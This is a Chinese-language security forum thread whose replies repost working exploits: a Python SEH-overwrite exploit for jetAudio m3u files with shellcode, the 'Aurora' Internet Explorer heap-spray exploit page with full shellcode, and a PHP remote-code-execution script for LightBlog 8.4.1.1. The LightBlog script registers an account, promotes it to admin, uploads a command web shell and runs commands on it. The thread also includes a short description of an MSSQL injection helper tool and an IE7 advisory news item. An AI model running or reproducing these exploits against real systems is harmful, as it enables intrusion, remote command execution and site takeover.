最近看过此主题的会员

返回列表 发帖

基于各种原因,非安全中国网正进行秘密计划敬请期待

欲知后事如何,请继续关注。。。

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

如何获取金币

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

非安全5周年纪念 团队T恤出炉

是否支持非安全中国网5周年定制纪念T恤?

恭祝非安全中国网全体朋友龙年大吉!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

各种原因是啥原因啊

TOP

求科普。。。

TOP

jetAudio 7.x (m3u File) Local SEH 覆盖写入 Exploit
#!/usr/bin/python# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl># Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish# Shellcode: Windows Execute Command (calc) <metasploit.com># Just for fun  ;) ##from struct import packm3u = ("#EXTM3U
http://%s")shellcode = ("x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6""xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7""x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58""x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae""x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60""xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf""xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70""x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33""xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04""x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06SE_HANDLER = 0x7CEA61F7       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)buf = "CLICK ME"buf += "x20" * 1009buf += pack("<L", NEXT_SEH_RECORD)buf += pack("<L", SE_HANDLER)buf += "x90" * 128buf += shellcodem3u %= buffd = open("evil.m3u", "w")fd.write(m3u)fd.close()print "DONE"# EoFdown.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Aurora被爆EXP疑似为攻击GOOGLE的代码
"Aurora"代码:This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. <html><head><script>var var_comment = "COMMENT";var var_x1 = new Array();for (i = 0; i < 200; i ++ ){var_x1 = document.createElement(var_comment);var_x1.data = "var_abc";};var var_e1 = null;var var_memory = new Array();function var_boom() {var var_shellcode = unescape( '%u4b27%u9bd6%u96d6%ufd98%u9343%u924f%u93d6%uf94e%u4892%u4293%ud6f9%u4f4e%uf892%uf8d6%ufd9b%u9791%u2ffc%u374e%u9392%u469f%u4f49%u4b3f%u9b4a%u2f93%u3f4a%u914f%ufd37%u9f92%u4e46%uf991%u9197%u9f98%u464f%u9642%u4248%u27fc%u4627%u9946%uf993%ufd48%u4ff9%u9bf9%ud693%u97fc%u4291%u9737%u4149%u4092%u9f4e%u969b%u994a%u41fc%u4e37%u9043%u9048%u9f4f%u9f9b%u4342%ud64b%u4740%u9bfc%u4a48%u3f3f%u41f5%ufd41%u974e%u4b98%u3ffc%u2796%u2727%u9227%u4347%u414a%ud6f9%u994f%u414a%u9890%u9092%u3ff9%u4ef5%u9b96%uf543%u4398%u4b9b%u404a%ufc96%u4993%u9649%u4296%u924a%u4f98%ufd3f%u40f5%uf990%u4f96%u4bfc%u3f40%u9093%u9f4b%u374a%u90d6%ud6fc%u4b93%u9847%u4148%u3f93%u9997%uf999%u90fd%ufcf8%uf849%u4249%u9046%u4997%uf548%u3f98%ud649%u4a97%u9b37%u40f5%u92fc%u9348%u3740%u9b97%u4e41%u9743%u9099%u3742%u9090%u4697%u9242%u4e46%u9ffc%u40fc%u9798%u9149%u993f%u4342%u464e%u4742%u9027%u4896%u4b27%u4096%uf94b%u9f4e%u9627%u3ff5%uf541%u49fc%uf547%u48d6%u4242%u4642%uf9fd%u994f%ufdd6%u3f43%u422f%u4142%ufc9b%u9327%u4a43%u2749%u4af8%u4b93%ud637%u92fd%u4e9f%u4b97%uf59f%u472f%u4b92%u4a48%uf927%u993f%u404f%u98fc%u3741%u99fd%u4b42%uf543%u4ff9%u9f99%ufd9f%u984e%u9792%u2f3f%u4742%u9337%u9b9b%u4648%u4341%u4af9%u9f4e%u9890%u93fd%u3f47%u4896%ud643%u9698%uf89b%ud62f%u494f%u4f9f%u2798%u2f4e%u914a%u48f5%u4b37%u4a4e%u2ff9%u9148%u9837%u2727%u9092%u4af9%u49fd%u414f%u4e48%u3796%u4147%u2f47%u47d6%ufdd6%u2f9b%u4396%u4940%u9637%u9f90%u4240%u3746%u904b%u93f5%u2747%u4fd6%u4891%u4a9b%u4693%u9341%u4b40%u9637%u9190%u4947%u4bf5%u92fc%u47f9%u2f40%u2ffd%ufd40%u40f9%u372f%u372f%u4ff5%u2f99%u2f92%u4243%uf5f9%u4048%u9f9b%u97fc%u279f%u964e%u9f4a%ufcf9%uf596%u91d6%u99f8%uf949%uf543%u4b48%u932f%u9640%uf948%u2f2f%ufc2f%ufd43%u4993%u92fc%u3ff5%uf94a%u96f9%u9642%uf54b%u9f96%u4e4b%u4e40%u9f4f%uf998%u4b49%u999b%ufc37%ufd2f%u90d6%u4f48%u4afc%u4796%ufc3f%u3f46%u9798%u4148%u9f3f%u49f5%u4a37%ufd2f%u404b%u9b9b%u9848%u9143%u43f5%ufdf8%u493f%u48f8%u4148%u9099%u97fc%ud627%uf546%u4642%u41fd%u9b40%u93f5%u9847%u4241%u9092%u3793%u4a96%u9992%ud690%uf946%u4342%u469f%u4efc%uf991%u933f%u92f5%u9796%u4093%u93fc%u484a%u474e%u2f92%u4848%u4390%u4e43%u4a27%u409f%u939b%ufd99%u4ff5%ufd37%u4391%uf8f8%u9f27%u974f%u3f93%uf53f%u4091%u4627%u4f96%u3f96%u4b98%u9892%u4090%u4142%u9341%u9147%u999b%u4f41%u27d6%u98f9%u4392%u4746%u9640%u3797%u4b90%u914a%u924f%u999f%u9fd6%u3741%u412f%ueebf%uf983%u2ba1%ud9c9%ud9f7%u2474%u5ef4%u35b1%u7e31%u8311%ufcee%u7e03%u61e3%u200c%u313f%udc1d%u4640%uaa09%ub7be%ucdca%u5237%udffb%u1623%uefae%u7a20%u9b43%u6f64%ue9d0%u80a0%u4751%uaf96%u6962%u6316%ueba0%u7eea%ucbf5%ub0d3%u0d08%uac14%u5fe3%ubacd%u7056%ufe7a%u716a%u74ac%u09d2%u4bc9%ua3a7%u9bd0%ubf18%u039a%ue712%u353a%ufbf7%u7c06%ucf7c%u7ffd%u0154%ub1fe%uce98%u7dc1%u0e15%ub906%u65c6%ub97c%u7e7b%uc347%u0ba7%u6355%uab23%u95bd%u2ae0%u9936%u384d%ube10%ued50%uba2b%u10d9%u4afb%u3699%u17df%u5679%uf246%u672c%u5a98%ucd90%u49d3%u74c5%u07be%uf418%u61c5%u061a%uc1c5%u3773%u8e4e%uc804%uea85%u82fb%u5b87%u4a94%ude52%u6cf9%u1d89%uef04%ude3b%ueff3%udb4e%ub7b8%u91a3%u5dd1%u06c3%u77d1%uc7ad%u1d59%u7941%uf3c6%u01c4%u0c63');var var_spray = unescape( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );do { var_spray += var_spray } while( var_spray.length < 0xd0000 );for(var_i = 0; var_i < 150; var_i++) var_memory[var_i] = var_spray + var_shellcode;}function var_ev1(evt){var_boom();var_e1 = document.createEventObject(evt);document.getElementById("var_sp1").innerHTML = "";window.setInterval(var_ev2, 50);}function var_ev2(){p = "u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d";for (i = 0; i < var_x1.length; i ++ ){var_x1.data = p;}var t = var_e1.srcElement;}</script></head><body><span id="var_sp1"><img src="/a4tpCOZ3Tvar_start.gif" onload="var_ev1(event)"></span></body></html></body></html>----以下引用博主评论------这真是"Aurora"么?如果是的话就太让人失望了。我认为如果一个ie0day能达到这么大的影响,起码要满足以下的条件之一:1.不需要javascript、activex支持,导致在outlook中也能命中。(outlook的ie控件是禁止javascript、activex的)2.可以直接“推送”给远程用户,就像远程溢出那样。显然,从exploit来看这个exploit和以往ie xday并没有多大区别。heapspray在IE蜜罐里不被捕获的概率几乎是0;而且就命中率、适用范围而言还远远不如前段时间的pdf0day,怎么会造成这么大影响?是炒作么?微软安全公告提示打开IE DEP保护可以避免攻击。所以如果这个ie0day真有这么大影响的话,应该还存在不使用heapspray攻击代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MSSQL手工注入查找目录辅助工具
主要用于手工注入的时候查找目录用的可以自行的将语句编码功能有:1:通过注册表读取网站目录2:通过列目录排查3:通过搜索文件得到目录4:数据库挂马5:注入常用的编码工具



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

LightBlog 8.4.1.1 远程代码执行漏洞
安装PHP.EXE  CMD下执行
#!/usr/bin/php -q -d short_open_tag=on以下为PHP Exploit 保存为*.PHP
<?echo "LightBlog 8.4.1.1 Remote Code Execution Exploitby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>Thanks to rgod for the php code and Marty for the Love";if ($argc<3) {echo "Usage: php ".$argv[0]." Host Path Host:          target server (ip/hostname)Path:          path of lightblogExample:php ".$argv[0]." localhost /lightblog/ dir";die;}error_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",5);function quick_dump($string){  $result='';$exa='';$cont=0;  for ($i=0; $i<=strlen($string)-1; $i++)  {   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))   {$result.="  .";}   else   {$result.="  ".$string[$i];}   if (strlen(dechex(ord($string[$i])))==2)   {$exa.=" ".dechex(ord($string[$i]));}   else   {$exa.=" 0".dechex(ord($string[$i]));}   $cont++;if ($cont==15) {$cont=0; $result.="
"; $exa.="
";}  }return $exa."
".$result;}$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';function sendpacketii($packet){  global $proxy, $host, $port, $html, $proxy_regex;  if ($proxy=='') {    $ock=fsockopen(gethostbyname($host),$port);    if (!$ock) {      echo 'No response from '.$host.':'.$port; die;    }  }  else {        $c = preg_match($proxy_regex,$proxy);    if (!$c) {      echo 'Not a valid proxy...';die;    }    $parts=explode(':',$proxy);    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
";    $ock=fsockopen($parts[0],$parts[1]);    if (!$ock) {      echo 'No response from proxy...';die;        }  }  fputs($ock,$packet);  if ($proxy=='') {    $html='';    while (!feof($ock)) {      $html.=fgets($ock);    }  }  else {    $html='';    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {      $html.=fread($ock,1);    }  }  fclose($ock);}$host=$argv[1];$path=$argv[2];$cmd="";for ($i=3; $i<=$argc-1; $i++){$cmd.=" ".$argv[$i];}$cmd=urlencode($cmd);$port=80;$proxy="";if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}echo "Step 0 - If Shell already exists, run it..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';//Retrieving the "confirmation" code$packet ="GET ".$p."register.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);$conf_code = $fuori[1];$rand_code = $fuori[2];//Doing the registration$data="rand=$rand_code&amp;val=$conf_code&amp;username_post=Piggy_Marty&amp;pwd1_post=DAFORNO_IMPERAT&amp;pwd2_post=DAFORNO_IMPERAT&amp;name_post=Piggy_Marty&amp;email_post=hawkgotyou@gmail.com";$packet="POST ".$p."register.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 2 - Promoting Piggy_Marty to admin level..';$data="type_post=admin&amp;username_post=Piggy_Marty";$packet="POST ".$p."cp_memberedit.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 3 - Uploading Shell Creator..';$data="-----------------------------7d529a1d23092a
";$data.="Content-Disposition: form-data; name="image"; filename="piggy_marty_creator.php"
";$data.="Content-Type:

";$data.="<?php$fp=fopen('piggy_marty.php','w');fputs($fp,'<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_GET[cmd]=stripslashes($_GET[cmd]);}echo 666999;passthru($_GET[cmd]);echo 666999;?>');fclose($fp);chmod('piggy_marty.php',777);?>
";$data.='-----------------------------7d529a1d23092aContent-Disposition: form-data; name="title"Not so good if you see this..-----------------------------7d529a1d23092aContent-Disposition: form-data; name="post"An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details-----------------------------7d529a1d23092a--';$packet="POST ".$p."main.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Referer: http://".$host.$path."/
";$packet.="Cookie: Lightblog_username=Piggy_Marty&amp;Lightblog_password=DAFORNO_IMPERAT
";$packet.="Accept-Language: it
";$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: ".$host."
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 4 - Executing Creator..';$packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);sleep(1);echo "Step 5 - Execute Commands..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}# Coded With BH Fast Generator v0.1?>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

微软发布IE7最新安全警告 Vista不受影响
微软今天发布了针对IE浏览器当前版本的安全警告,新发现的IE安全漏洞可对Windows XP、Server 2003和Windows 2000系统造成影响,但Vista系统不受影响。IE6.0以前的版本也受影响,目前发现的主要是运行当前版本IE7的XP/2000/Server 2003系统。微软在其安全博客中发布公告称,Windows系统运行经过特殊处理的URLs或URIs时可能出现安全威胁。IE7对一个Windows组件进行升级,并对IE和Windows Shell之间在运行URLs或URIs时的通信进行调整,当应用程序向Windows传送未经激活的URLs或URIs时,漏洞会被利用以实施恶意攻击。
攻击得逞需要一个前提,即用户必须激活一个未经过验证的经过特殊编写的URLs或URIs。比如,用户会点击邮件中的一个链接,这样有可能使恶意代码被激活并运行。
微软提供的唯一建议是,时刻保持防火墙处于打开状态,并及时更新,这意味着微软可能在例行的每月星期二补丁日之外发布补丁。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表